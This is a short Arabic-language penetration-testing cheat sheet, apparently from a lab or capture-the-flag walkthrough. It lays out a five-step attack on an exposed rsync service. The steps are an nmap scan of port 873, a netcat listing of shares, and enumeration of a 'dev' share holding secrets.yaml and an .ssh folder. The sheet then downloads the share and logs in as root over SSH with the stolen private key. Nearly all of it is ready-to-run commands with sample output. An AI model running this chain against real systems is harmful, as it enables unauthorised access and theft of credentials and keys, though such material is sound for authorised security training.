💻 الأوامر الكاملة
STEP 1 — اكتشاف Rsync:
sudo nmap -sV -p 873 TARGET
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
STEP 2 — شوف الـ Shares المتاحة:
nc -nv TARGET 873
@RSYNCD: 31.0
#list
dev Dev Tools ← اسم الـ share!
@RSYNCD: EXIT
STEP 3 — Enumerate الـ Share:
rsync -av --list-only rsync://TARGET/dev
drwxr-xr-x 48 .
-rw-r--r-- 0 build.sh
-rw-r--r-- 0 secrets.yaml ← مثير للاهتمام!
drwx------ 54 .ssh ← SSH keys! 🎯
STEP 4 — حمّل كل شيء:
# تحميل الـ share كامل:
rsync -av rsync://TARGET/dev ./local_copy
# تحميل مجلد .ssh فقط:
rsync -av rsync://TARGET/dev/.ssh ./
# لو Rsync فوق SSH:
rsync -av -e ssh rsync://TARGET/dev ./
rsync -av -e "ssh -p2222" rsync://TARGET/dev ./
STEP 5 — استخدم الـ Private Key:
chmod 600 .ssh/id_rsa
ssh -i .ssh/id_rsa root@TARGET
Welcome to Ubuntu! ← 💥 RCE!
🎯 .ssh/id_rsa = private key = دخول مباشر على SSH بدون باسورد!